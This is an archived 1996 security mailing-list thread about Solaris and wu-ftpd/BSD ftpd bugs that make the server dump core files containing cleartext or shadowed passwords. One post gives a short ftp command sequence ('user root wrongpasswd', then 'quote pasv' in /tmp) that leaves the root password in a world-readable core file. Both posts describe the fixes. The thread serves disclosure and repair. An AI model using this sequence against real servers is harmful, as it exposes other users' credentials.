Solaris (and others) ftpd core dump bug

From: Martin Rex (martin.rex@sap-ag.de)
Date: Tue, 15 Oct 1996 18:14:08 -0400 

      
James Poland 6-5251 wrote:
>
> On Solaris 2.5.1, the core file contains only the user's password in
> cleartext. How hard is it to crash someone else's ftp session?

Killing from the command line doesn't seem to work, but:

SunOS 5.5:

logon via ftp with your regular user/password,
ftp> cd /tmp
ftp> user root wrongpasswd
ftp> quote pasv

voila, root password in world readable core dump under /tmp

-Martin

PS: Sun's ftpd doesn't core when issuing "quote pasv" before logon,
    so the seem to have used the proposed fix

         Checking for "pw != NULL"

    So this proposal was simple and obvious   ... and incomplete. :)

FromVadim Kolontsov (vadim@tversu.ac.ru)
Date: Tue, 15 Oct 1996 08:41:40 +0300 


Hello,

  wuftpd can create core dump in two following situation too (yes, dump
will contain some subset of shadowed passwords):

1) "pasv" given when user not logged in
   (caused by error in passive())

2) more than 100 arguments to any executable command (for example, "list")
   (caused by error in ftpd_popen())

  First error presents in almost all version of bsd's ftpd, wu-ftpd and
derived. Second error presents in all versions of bsd's ftpd, wu-ftpd and
derived (as far as I know).
  Bugfixes are simple. Checking for "pw != NULL" in first case, and
checking for "argc < 100" in another one (see sources).

Best regards, Vadim.

P.S. By the way, who knows e-mail of wu-ftpd developer? Mail me, pls...
--------------------------------------------------------------------------
Vadim Kolontsov                                          SysAdm/Programmer
Tver Regional Center of New Information Technologies          Networks Lab